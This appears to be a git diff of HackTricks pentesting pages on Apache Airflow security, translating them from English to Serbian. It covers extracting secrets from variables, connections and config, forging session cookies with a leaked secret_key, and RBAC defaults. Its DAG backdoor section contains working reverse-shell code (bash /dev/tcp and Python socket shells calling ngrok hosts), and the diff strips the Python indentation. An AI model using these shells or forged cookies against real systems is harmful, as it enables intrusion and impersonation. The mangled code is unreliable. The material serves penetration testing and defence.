{{#include ../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/README.md b/src/pentesting-ci-cd/apache-airflow-security/README.md index aac46128c..4dbf3f480 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/README.md +++ b/src/pentesting-ci-cd/apache-airflow-security/README.md @@ -2,22 +2,21 @@ {{#include ../../banners/hacktricks-training.md}} -### Basic Information +### Osnovne Informacije -[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications. +[**Apache Airflow**](https://airflow.apache.org) služi kao platforma za **orchestraciju i zakazivanje podataka ili radnih tokova**. Termin "orchestration" u kontekstu podataka označava proces organizovanja, koordinacije i upravljanja složenim radnim tokovima podataka koji potiču iz različitih izvora. Primarna svrha ovih orkestriranih radnih tokova podataka je da obezbede obrađene i upotrebljive skupove podataka. Ovi skupovi podataka se široko koriste u mnogim aplikacijama, uključujući, ali ne ograničavajući se na alate za poslovnu inteligenciju, modele podataka i mašinskog učenja, koji su svi osnovni za funkcionisanje aplikacija velikih podataka. -Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**. +U suštini, Apache Airflow će vam omogućiti da **zakazujete izvršenje koda kada se nešto** (događaj, cron) **dogodi**. -### Local Lab +### Lokalni Laboratorija #### Docker-Compose -You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM). +Možete koristiti **docker-compose konfiguracioni fajl sa** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) da pokrenete kompletnu apache airflow docker sredinu. (Ako ste na MacOS-u, obavezno dodelite najmanje 6GB RAM-a docker VM-u). #### Minikube -One easy way to **run apache airflo**w is to run it **with minikube**: - +Jedan jednostavan način da **pokrenete apache airflow** je da ga pokrenete **sa minikube**: ```bash helm repo add airflow-stable https://airflow-helm.github.io/charts helm repo update @@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow # Use this command to delete it helm delete airflow-release ``` - ### Airflow Configuration -Airflow might store **sensitive information** in its configuration or you can find weak configurations in place: +Airflow može čuvati **osetljive informacije** u svojoj konfiguraciji ili možete pronaći slabe konfiguracije: {{#ref}} airflow-configuration.md @@ -38,7 +36,7 @@ airflow-configuration.md ### Airflow RBAC -Before start attacking Airflow you should understand **how permissions work**: +Pre nego što počnete sa napadom na Airflow, trebali biste razumeti **kako funkcionišu dozvole**: {{#ref}} airflow-rbac.md @@ -48,55 +46,52 @@ airflow-rbac.md #### Web Console Enumeration -If you have **access to the web console** you might be able to access some or all of the following information: +Ako imate **pristup web konzoli**, možda ćete moći da pristupite nekim ili svim sledećim informacijama: -- **Variables** (Custom sensitive information might be stored here) -- **Connections** (Custom sensitive information might be stored here) - - Access them in `http:///connection/list/` -- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) -- List **users & roles** -- **Code of each DAG** (which might contain interesting info) +- **Varijable** (Prilagođene osetljive informacije mogu biti sačuvane ovde) +- **Konekcije** (Prilagođene osetljive informacije mogu biti sačuvane ovde) +- Pristupite im na `http:///connection/list/` +- [**Konfiguracija**](./#airflow-configuration) (Osetljive informacije kao što su **`secret_key`** i lozinke mogu biti sačuvane ovde) +- Lista **korisnika i uloga** +- **Kod svakog DAG-a** (koji može sadržati zanimljive informacije) #### Retrieve Variables Values -Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http:///variable/list/`.\ -Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**. +Varijable se mogu čuvati u Airflow-u tako da **DAG-ovi** mogu **pristupiti** njihovim vrednostima. Slično je tajnama drugih platformi. Ako imate **dovoljno dozvola**, možete im pristupiti u GUI-u na `http:///variable/list/`.\ +Airflow po defaultu prikazuje vrednost varijable u GUI-u, međutim, prema [**ovome**](https://marclamberti.com/blog/variables-with-apache-airflow/), moguće je postaviti **listu varijabli** čija će **vrednost** biti prikazana kao **zvezdice** u **GUI**. ![](<../../images/image (164).png>) -However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\ -To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\ -Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it: +Međutim, ove **vrednosti** se i dalje mogu **pribaviti** putem **CLI** (morate imati pristup bazi podataka), **izvršavanjem proizvoljnog DAG-a**, **API** pristupom krajnjoj tački varijabli (API mora biti aktiviran), i **čak i samim GUI-em!**\ +Da biste pristupili tim vrednostima iz GUI-a, jednostavno **izaberite varijable** kojima želite da pristupite i **kliknite na Akcije -> Izvezi**.\ +Drugi način je da izvršite **bruteforce** na **skrivenoj vrednosti** koristeći **filtriranje pretrage** dok je ne dobijete: ![](<../../images/image (152).png>) #### Privilege Escalation -If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**. - +Ako je konfiguracija **`expose_config`** postavljena na **True**, iz **uloge Korisnik** i **naviše** mogu **čitati** **konfiguraciju na web-u**. U ovoj konfiguraciji se pojavljuje **`secret_key`**, što znači da svaki korisnik sa ovim važećim može **napraviti svoj potpisani kolačić da bi se pretvarao da je bilo koji drugi korisnički nalog**. ```bash flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}" ``` +#### DAG Backdoor (RCE u Airflow radniku) -#### DAG Backdoor (RCE in Airflow worker) - -If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\ -Note that this reverse shell is going to be executed inside an **airflow worker container**: - +Ako imate **pristup za pisanje** na mestu gde se **DAG-ovi čuvaju**, možete jednostavno **napraviti jedan** koji će vam poslati **obrnuti shell.**\ +Imajte na umu da će ovaj obrnuti shell biti izvršen unutar **airflow radničkog kontejnera:** ```python import pendulum from airflow import DAG from airflow.operators.bash import BashOperator with DAG( - dag_id='rev_shell_bash', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_bash', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = BashOperator( - task_id='run', - bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', - ) +run = BashOperator( +task_id='run', +bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', +) ``` ```python @@ -105,75 +100,66 @@ from airflow import DAG from airflow.operators.python import PythonOperator def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") +s = socket.socket() +s.connect((rhost, port)) +[os.dup2(s.fileno(),fd) for fd in (0,1,2)] +pty.spawn("/bin/sh") with DAG( - dag_id='rev_shell_python', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_python', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = PythonOperator( - task_id='rs_python', - python_callable=rs, - op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} - ) +run = PythonOperator( +task_id='rs_python', +python_callable=rs, +op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} +) ``` +#### DAG Backdoor (RCE u Airflow scheduler-u) -#### DAG Backdoor (RCE in Airflow scheduler) - -If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder. - +Ako postavite nešto da bude **izvršeno u korenu koda**, u trenutku pisanja ovog teksta, biće **izvršeno od strane scheduler-a** nakon nekoliko sekundi nakon što ga stavite unutar DAG-ove fascikle. ```python import pendulum, socket, os, pty from airflow import DAG from airflow.operators.python import PythonOperator def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") +s = socket.socket() +s.connect((rhost, port)) +[os.dup2(s.fileno(),fd) for fd in (0,1,2)] +pty.spawn("/bin/sh") rs("2.tcp.ngrok.io", 14403) with DAG( - dag_id='rev_shell_python2', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), +dag_id='rev_shell_python2', +schedule_interval='0 0 * * *', +start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), ) as dag: - run = PythonOperator( - task_id='rs_python2', - python_callable=rs, - op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} +run = PythonOperator( +task_id='rs_python2', +python_callable=rs, +op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} ``` +#### Kreiranje DAG-a -#### DAG Creation +Ako uspete da **kompromitujete mašinu unutar DAG klastera**, možete kreirati nove **DAG skripte** u `dags/` folderu i one će biti **replicirane na ostalim mašinama** unutar DAG klastera. -If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster. +#### Injekcija koda u DAG -#### DAG Code Injection +Kada izvršavate DAG iz GUI-a, možete **proslediti argumente**.\ +Stoga, ako DAG nije pravilno kodiran, mogao bi biti **ranjiv na Injekciju Komandi.**\ +To se desilo u ovom CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927) -When you execute a DAG from the GUI you can **pass arguments** to it.\ -Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\ -That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927) - -All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**. - -Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**: +Sve što treba da znate da **počnete da tražite injekcije komandi u DAG-ovima** je da se **parametri** **pristupaju** kodom **`dag_run.conf.get("param_name")`**. +Štaviše, ista ranjivost može se javiti sa **varijablama** (imajte na umu da sa dovoljno privilegija možete **kontrolisati vrednost varijabli** u GUI-u). Varijable se **pristupaju sa**: ```python from airflow.models import Variable [...] foo = Variable.get("foo") ``` - -If they are used for example inside a a bash command, you could perform a command injection. +Ако се користе, на пример, унутар bash команде, могли бисте извршити инјекцију команде. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md index 5fd8e486b..5441fce97 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-configuration.md @@ -4,112 +4,102 @@ ## Configuration File -**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** +**Apache Airflow** generiše **config fajl** na svim airflow mašinama pod nazivom **`airflow.cfg`** u home direktorijumu korisnika airflow. Ovaj config fajl sadrži informacije o konfiguraciji i **može sadržati zanimljive i osetljive informacije.** -**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** +**Postoje dva načina da se pristupi ovom fajlu: kompromitovanjem neke airflow mašine ili pristupanjem web konzoli.** -Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. +Napomena da **vrednosti unutar config fajla** **možda nisu one koje se koriste**, jer ih možete prepisati postavljanjem env varijabli kao što su `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. -If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ -If you have **access to some machine inside the airflow env**, check the **environment**. +Ako imate pristup **config fajlu na web serveru**, možete proveriti **pravu aktivnu konfiguraciju** na istoj stranici na kojoj se prikazuje konfiguracija.\ +Ako imate **pristup nekoj mašini unutar airflow okruženja**, proverite **okruženje**. -Some interesting values to check when reading the config file: +Neke zanimljive vrednosti za proveru prilikom čitanja config fajla: ### \[api] -- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** -- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** -- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: - - `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API - - `airflow.api.auth.backend.default`: **Everyone can** access it without authentication - - `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** - - `airflow.api.auth.backend.basic_auth`: For **basic authentication** - - `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). - - `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). - - You can also **create you own authentication** method with python. -- **`google_key_path`:** Path to the **GCP service account key** +- **`access_control_allow_headers`**: Ovo označava **dozvoljene** **zaglavlja** za **CORS** +- **`access_control_allow_methods`**: Ovo označava **dozvoljene metode** za **CORS** +- **`access_control_allow_origins`**: Ovo označava **dozvoljene izvore** za **CORS** +- **`auth_backend`**: [**Prema dokumentaciji**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) nekoliko opcija može biti na snazi za konfiguraciju ko može pristupiti API-ju: +- `airflow.api.auth.backend.deny_all`: **Podrazumevano niko** ne može pristupiti API-ju +- `airflow.api.auth.backend.default`: **Svi mogu** pristupiti bez autentifikacije +- `airflow.api.auth.backend.kerberos_auth`: Za konfiguraciju **kerberos autentifikacije** +- `airflow.api.auth.backend.basic_auth`: Za **basic autentifikaciju** +- `airflow.composer.api.backend.composer_auth`: Koristi autentifikaciju kompozitora (GCP) (iz [**ovde**](https://cloud.google.com/composer/docs/access-airflow-api)). +- `composer_auth_user_registration_role`: Ovo označava **ulogu** koju će **korisnik kompozitora** dobiti unutar **airflow** (**Op** podrazumevano). +- Takođe možete **napraviti svoju metodu autentifikacije** pomoću Pythona. +- **`google_key_path`:** Putanja do **GCP servisnog naloga** ### **\[atlas]** -- **`password`**: Atlas password -- **`username`**: Atlas username +- **`password`**: Atlas lozinka +- **`username`**: Atlas korisničko ime ### \[celery] -- **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) -- **`result_backend`**: Postgres url which may contain **credentials**. -- **`ssl_cacert`**: Path to the cacert -- **`ssl_cert`**: Path to the cert -- **`ssl_key`**: Path to the key +- **`flower_basic_auth`** : Akreditivi (_user1:password1,user2:password2_) +- **`result_backend`**: Postgres url koji može sadržati **akreditive**. +- **`ssl_cacert`**: Putanja do cacert +- **`ssl_cert`**: Putanja do certifikata +- **`ssl_key`**: Putanja do ključa ### \[core] -- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. -- **`fernet_key`**: Key to store encrypted variables (symmetric) -- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. -- **`security`**: What security module to use (for example kerberos) +- **`dag_discovery_safe_mode`**: Omogućeno podrazumevano. Kada se otkrivaju DAG-ovi, ignorišu se svi fajlovi koji ne sadrže stringove `DAG` i `airflow`. +- **`fernet_key`**: Ključ za čuvanje enkriptovanih varijabli (simetričan) +- **`hide_sensitive_var_conn_fields`**: Omogućeno podrazumevano, skriva osetljive informacije o konekcijama. +- **`security`**: Koji sigurnosni modul koristiti (na primer kerberos) ### \[dask] -- **`tls_ca`**: Path to ca -- **`tls_cert`**: Part to the cert -- **`tls_key`**: Part to the tls key +- **`tls_ca`**: Putanja do ca +- **`tls_cert`**: Putanja do certifikata +- **`tls_key`**: Putanja do tls ključa ### \[kerberos] -- **`ccache`**: Path to ccache file -- **`forwardable`**: Enabled by default +- **`ccache`**: Putanja do ccache fajla +- **`forwardable`**: Omogućeno podrazumevano ### \[logging] -- **`google_key_path`**: Path to GCP JSON creds. +- **`google_key_path`**: Putanja do GCP JSON akreditiva. ### \[secrets] -- **`backend`**: Full class name of secrets backend to enable -- **`backend_kwargs`**: The backend_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. +- **`backend`**: Puno ime klase backend-a za tajne koje treba omogućiti +- **`backend_kwargs`**: Parametar backend_kwargs se učitava u rečnik i prosleđuje **init** klasi backend-a za tajne. ### \[smtp] -- **`smtp_password`**: SMTP password -- **`smtp_user`**: SMTP user +- **`smtp_password`**: SMTP lozinka +- **`smtp_user`**: SMTP korisnik ### \[webserver] -- **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value -- **`cookie_secure`**: Set **secure flag** on the the session cookie -- **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** -- **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) -- **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) -- **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** -- **`web_server_ssl_key`**: **Path** to the **SSL** **Key** -- **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible +- **`cookie_samesite`**: Podrazumevano je **Lax**, tako da je već najslabija moguća vrednost +- **`cookie_secure`**: Postavi **sigurnu oznaku** na sesijskom kolačiću +- **`expose_config`**: Podrazumevano je False, ako je true, **config** može biti **pročitan** iz web **konzole** +- **`expose_stacktrace`**: Podrazumevano je True, prikazaće **python tracebacks** (potencijalno korisno za napadača) +- **`secret_key`**: Ovo je **ključ koji koristi flask za potpisivanje kolačića** (ako imate ovo možete **imitirati bilo kog korisnika u Airflow-u**) +- **`web_server_ssl_cert`**: **Putanja** do **SSL** **certifikata** +- **`web_server_ssl_key`**: **Putanja** do **SSL** **ključa** +- **`x_frame_enabled`**: Podrazumevano je **True**, tako da podrazumevano clickjacking nije moguć ### Web Authentication -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as - +Podrazumevano **web autentifikacija** je specificirana u fajlu **`webserver_config.py`** i konfiguriše se kao ```bash AUTH_TYPE = AUTH_DB ``` - -Which means that the **authentication is checked against the database**. However, other configurations are possible like - +Što znači da se **autentifikacija proverava u odnosu na bazu podataka**. Međutim, druge konfiguracije su moguće kao ```bash AUTH_TYPE = AUTH_OAUTH ``` +Da se **autentifikacija prepusti uslugama trećih strana**. -To leave the **authentication to third party services**. - -However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: - +Međutim, postoji i opcija da se **omogući pristup anonimnim korisnicima**, postavljanjem sledećeg parametra na **željenu ulogu**: ```bash AUTH_ROLE_PUBLIC = 'Admin' ``` - {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md index 7ff782327..ccd2f874d 100644 --- a/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md +++ b/src/pentesting-ci-cd/apache-airflow-security/airflow-rbac.md @@ -4,44 +4,40 @@ ## RBAC -(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. +(From the docs)\[https://airflow.apache.org/docs/apache-airflow/stable/security/access-control.html]: Airflow dolazi sa **setom uloga po defaultu**: **Admin**, **User**, **Op**, **Viewer**, i **Public**. **Samo `Admin`** korisnici mogu **konfigurisati/menjati dozvole za druge uloge**. Ali nije preporučljivo da `Admin` korisnici menjaju ove podrazumevane uloge na bilo koji način uklanjanjem ili dodavanjem dozvola tim ulogama. -- **`Admin`** users have all possible permissions. -- **`Public`** users (anonymous) don’t have any permissions. -- **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** -- **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** -- **`Op`** users have `User` permissions plus additional op permissions. +- **`Admin`** korisnici imaju sve moguće dozvole. +- **`Public`** korisnici (anonimni) nemaju nikakve dozvole. +- **`Viewer`** korisnici imaju ograničene dozvole za pregled (samo čitanje). **Ne može videti konfiguraciju.** +- **`User`** korisnici imaju `Viewer` dozvole plus dodatne korisničke dozvole koje mu omogućavaju da malo upravlja DAG-ovima. On **može videti konfiguracioni fajl.** +- **`Op`** korisnici imaju `User` dozvole plus dodatne op dozvole. -Note that **admin** users can **create more roles** with more **granular permissions**. +Napomena: **admin** korisnici mogu **kreirati više uloga** sa više **granularnih dozvola**. -Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that. +Takođe, napomena da je jedina podrazumevana uloga sa **dozvolom da lista korisnike i uloge Admin, čak ni Op** to neće moći da uradi. ### Default Permissions -These are the default permissions per default role: +Ovo su podrazumevane dozvole po podrazumevanoj ulozi: - **Admin** -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs] +\[može brisati na Connections, može čitati na Connections, može uređivati na Connections, može kreirati na Connections, može čitati na DAGs, može uređivati na DAGs, može brisati na DAGs, može čitati na DAG Runs, može čitati na Task Instances, može uređivati na Task Instances, može brisati na DAG Runs, može kreirati na DAG Runs, može uređivati na DAG Runs, može čitati na Audit Logs, može čitati na ImportError, može brisati na Pools, može čitati na Pools, može uređivati na Pools, može kreirati na Pools, može čitati na Providers, može brisati na Variables, može čitati na Variables, može uređivati na Variables, može kreirati na Variables, može čitati na XComs, može čitati na DAG Code, može čitati na Configurations, može čitati na Plugins, može čitati na Roles, može čitati na Permissions, može brisati na Roles, može uređivati na Roles, može kreirati na Roles, može čitati na Users, može kreirati na Users, može uređivati na Users, može brisati na Users, može čitati na DAG Dependencies, može čitati na Jobs, može čitati na My Password, može uređivati na My Password, može čitati na My Profile, može uređivati na My Profile, može čitati na SLA Misses, može čitati na Task Logs, može čitati na Website, pristup meniju na Browse, pristup meniju na DAG Dependencies, pristup meniju na DAG Runs, pristup meniju na Documentation, pristup meniju na Docs, pristup meniju na Jobs, pristup meniju na Audit Logs, pristup meniju na Plugins, pristup meniju na SLA Misses, pristup meniju na Task Instances, može kreirati na Task Instances, može brisati na Task Instances, pristup meniju na Admin, pristup meniju na Configurations, pristup meniju na Connections, pristup meniju na Pools, pristup meniju na Variables, pristup meniju na XComs, može brisati na XComs, može čitati na Task Reschedules, pristup meniju na Task Reschedules, može čitati na Triggers, pristup meniju na Triggers, može čitati na Passwords, može uređivati na Passwords, pristup meniju na List Users, pristup meniju na Security, pristup meniju na List Roles, može čitati na User Stats Chart, pristup meniju na User's Statistics, pristup meniju na Base Permissions, može čitati na View Menus, pristup meniju na Views/Menus, može čitati na Permission Views, pristup meniju na Permission on Views/Menus, može dobiti na MenuApi, pristup meniju na Providers, može kreirati na XComs] - **Op** -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs] +\[može brisati na Connections, može čitati na Connections, može uređivati na Connections, može kreirati na Connections, može čitati na DAGs, može uređivati na DAGs, može brisati na DAGs, može čitati na DAG Runs, može čitati na Task Instances, može uređivati na Task Instances, može brisati na DAG Runs, može kreirati na DAG Runs, može uređivati na DAG Runs, može čitati na Audit Logs, može čitati na ImportError, može brisati na Pools, može čitati na Pools, može uređivati na Pools, može kreirati na Pools, može čitati na Providers, može brisati na Variables, može čitati na Variables, može uređivati na Variables, može kreirati na Variables, može čitati na XComs, može čitati na DAG Code, može čitati na Configurations, može čitati na Plugins, može čitati na DAG Dependencies, može čitati na Jobs, može čitati na My Password, može uređivati na My Password, može čitati na My Profile, može uređivati na My Profile, može čitati na SLA Misses, može čitati na Task Logs, može čitati na Website, pristup meniju na Browse, pristup meniju na DAG Dependencies, pristup meniju na DAG Runs, pristup meniju na Documentation, pristup meniju na Docs, pristup meniju na Jobs, pristup meniju na Audit Logs, pristup meniju na Plugins, pristup meniju na SLA Misses, pristup meniju na Task Instances, može kreirati na Task Instances, može brisati na Task Instances, pristup meniju na Admin, pristup meniju na Configurations, pristup meniju na Connections, pristup meniju na Pools, pristup meniju na Variables, pristup meniju na XComs, može brisati na XComs] - **User** -\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances] +\[može čitati na DAGs, može uređivati na DAGs, može brisati na DAGs, može čitati na DAG Runs, može čitati na Task Instances, može uređivati na Task Instances, može brisati na DAG Runs, može kreirati na DAG Runs, može uređivati na DAG Runs, može čitati na Audit Logs, može čitati na ImportError, može čitati na XComs, može čitati na DAG Code, može čitati na Plugins, može čitati na DAG Dependencies, može čitati na Jobs, može čitati na My Password, može uređivati na My Password, može čitati na My Profile, može uređivati na My Profile, može čitati na SLA Misses, može čitati na Task Logs, može čitati na Website, pristup meniju na Browse, pristup meniju na DAG Dependencies, pristup meniju na DAG Runs, pristup meniju na Documentation, pristup meniju na Docs, pristup meniju na Jobs, pristup meniju na Audit Logs, pristup meniju na Plugins, pristup meniju na SLA Misses, pristup meniju na Task Instances, može kreirati na Task Instances, može brisati na Task Instances] - **Viewer** -\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances] +\[može čitati na DAGs, može čitati na DAG Runs, može čitati na Task Instances, može čitati na Audit Logs, može čitati na ImportError, može čitati na XComs, može čitati na DAG Code, može čitati na Plugins, može čitati na DAG Dependencies, može čitati na Jobs, može čitati na My Password, može uređivati na My Password, može 